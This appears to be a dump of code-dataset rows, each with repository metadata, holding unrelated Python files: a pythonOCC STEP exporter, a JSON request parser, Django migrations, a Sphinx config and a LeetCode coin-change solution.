self.writer.Transfer(self.doc, STEPControl_AsIs)
def Write(self, filename=None):
if not filename:
filename = self.name
path, ext = os.path.splitext(filename)
if not ext:
ext = ".stp"
status = self.writer.Write(path + ext)
assert(status == IFSelect_RetDone)
if __name__ == "__main__":
display, start_display, add_menu, add_function_to_menu = init_display()
display.DisplayShape(gp_Pnt())
root = ExportCAFMethod(name="root")
root.Add(make_vertex(gp_Pnt()), name="pnt")
root.Add(make_plane(center=gp_Pnt(0, 0, 0)), name="pln0")
root.Add(make_plane(center=gp_Pnt(0, 0, 100)), name="pln1")
root.Add(make_circle(gp_Pnt(0, 0, 0), 100), name="circle")
root.Write()
display.FitAll()
box = BRepPrimAPI_MakeBox(10, 10, 10).Solid()
writer = STEPControl_Writer()
fp = writer.WS().TransferWriter().FinderProcess()
print(fp)
# start_display()
|
[
"[email protected]"
] | |
f8f06cef7eb7f8000f785ce17005caaadfb5e2b9
|
7241ebc05ce727585224b3a98b0824f99e63627d
|
/tool/parser/JsonParser.py
|
d6539c8d86cf5900ad1f23f9402586f492b77105
|
[] |
no_license
|
mabenteng/ai-kg-neo4j
|
ca0cc161244229821e3b89e516fb616828823609
|
713e978ffedda7986245307cace02fb7ec240acd
|
refs/heads/master
| 2021-10-20T03:50:43.583436 | 2019-02-25T14:25:11 | 2019-02-25T14:25:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,037 |
py
|
# -*- coding: utf-8 -*-
# coding=utf-8
"""
create_author : zhangcl
create_time : 2018-07-01
program : *_* parse the parameter and generate cypher *_*
"""
import json
class JsonParser:
"""
Parser of request parameter.
"""
def __init__(self):
"""
initialize local variables.
"""
self.jsondata = None
self.result = {}
def parseJson(self, queryparam):
"""
Parse the parameter string to json object .
:param queryparam: json string
The json object holds the detail of request all infomation.
"""
self.querystring = queryparam
flag = True
try:
self.jsondata = json.loads(queryparam)
self.result['code'] = 200
self.result['message'] = 'sucess'
except Exception as err:
flag = False
print err
self.result['code'] = 500
self.result['message'] = err.message
self.result['data'] = ''
return flag
|
[
"[email protected]"
] | |
bcc9f50e79bc76fc958fb5af4610f1cf265ea29f
|
a2dc75a80398dee58c49fa00759ac99cfefeea36
|
/bluebottle/projects/migrations/0087_merge_20190130_1355.py
|
705027f9fe948f888b16eb0437a1f45584ffd9db
|
[
"BSD-2-Clause"
] |
permissive
|
onepercentclub/bluebottle
|
e38b0df2218772adf9febb8c6e25a2937889acc0
|
2b5f3562584137c8c9f5392265db1ab8ee8acf75
|
refs/heads/master
| 2023-08-29T14:01:50.565314 | 2023-08-24T11:18:58 | 2023-08-24T11:18:58 | 13,149,527 | 15 | 9 |
BSD-3-Clause
| 2023-09-13T10:46:20 | 2013-09-27T12:09:13 |
Python
|
UTF-8
|
Python
| false | false | 341 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-01-30 12:55
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0086_auto_20190117_1007'),
('projects', '0086_merge_20190121_1425'),
]
operations = [
]
|
[
"[email protected]"
] | |
7023e5ecdc00bc0113342ae94985d9d03e3efcba
|
afc693a1095f99cc586770fbd5a65dd40f2d822f
|
/docs/conf.py
|
82c0e03d8f2804c1c403a6bc1943dfa63271cb9d
|
[
"LicenseRef-scancode-homebrewed",
"Beerware"
] |
permissive
|
ndkoch/ihatemoney
|
974f3b75d3bc2519d3c17f492d221da9fa780236
|
51bc76ecc5e310602216fb8eaa2ede2ab43b3d00
|
refs/heads/master
| 2020-09-27T00:03:31.320035 | 2019-12-09T00:19:22 | 2019-12-09T00:19:22 | 226,371,920 | 0 | 2 |
NOASSERTION
| 2019-12-09T00:19:23 | 2019-12-06T16:48:41 |
Python
|
UTF-8
|
Python
| false | false | 266 |
py
|
# coding: utf8
import sys, os
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
project = "I hate money"
copyright = "2011, The 'I hate money' team"
version = "1.0"
release = "1.0"
exclude_patterns = ["_build"]
pygments_style = "sphinx"
|
[
"[email protected]"
] | |
a138938f68658430a7186f241fa868fec2590e61
|
865bd5e42a4299f78c5e23b5db2bdba2d848ab1d
|
/Python/322.coin-change.135397822.ac.python3.py
|
5e9a0619060981526f9753a831b848d95c17ab70
|
[] |
no_license
|
zhiymatt/Leetcode
|
53f02834fc636bfe559393e9d98c2202b52528e1
|
3a965faee2c9b0ae507991b4d9b81ed0e4912f05
|
refs/heads/master
| 2020-03-09T08:57:01.796799 | 2018-05-08T22:01:38 | 2018-05-08T22:01:38 | 128,700,683 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,207 |
py
|
#
# [322] Coin Change
#
# https://leetcode.com/problems/coin-change/description/
#
# algorithms
# Medium (26.58%)
# Total Accepted: 92.2K
# Total Submissions: 346.9K
# Testcase Example: '[1]\n0'
#
#
# You are given coins of different denominations and a total amount of money
# amount. Write a function to compute the fewest number of coins that you need
# to make up that amount. If that amount of money cannot be made up by any
# combination of the coins, return -1.
#
#
#
# Example 1:
# coins = [1, 2, 5], amount = 11
# return 3 (11 = 5 + 5 + 1)
#
#
#
# Example 2:
# coins = [2], amount = 3
# return -1.
#
#
#
# Note:
# You may assume that you have an infinite number of each kind of coin.
#
#
# Credits:Special thanks to @jianchao.li.fighter for adding this problem and
# creating all test cases.
#
class Solution:
def coinChange(self, coins, amount):
"""
:type coins: List[int]
:type amount: int
:rtype: int
"""
MAX = float('inf')
dp = [0] + [MAX] * amount
for i in range(1, amount + 1):
dp[i] = min([dp[i - c] if i - c >= 0 else MAX for c in coins]) + 1
return [dp[amount], -1][dp[amount] == MAX]
|
[
"[email protected]"
] | |
59ec3812dd12a3af309dfdcc37161df0ee23d29f
|
2e89ff0a41c5ae40bc420e5d298504927ceed010
|
/anything/users/migrations/0001_initial.py
|
fdaae19b9ff03d88bd74ac05938ab739e8e817a4
|
[] |
no_license
|
darkblank/anything
|
6dc676b7a099ddfce0c511db9234715a4f0ca66c
|
17589f8988ed1cb6fa049962bfd3fbe57c392fba
|
refs/heads/master
| 2020-03-11T09:40:32.608171 | 2018-05-12T09:20:27 | 2018-05-12T09:20:27 | 129,918,989 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 989 |
py
|
# Generated by Django 2.0.3 on 2018-05-11 23:36
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('nickname', models.CharField(max_length=20)),
('is_active', models.BooleanField(default=True)),
('is_admin', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.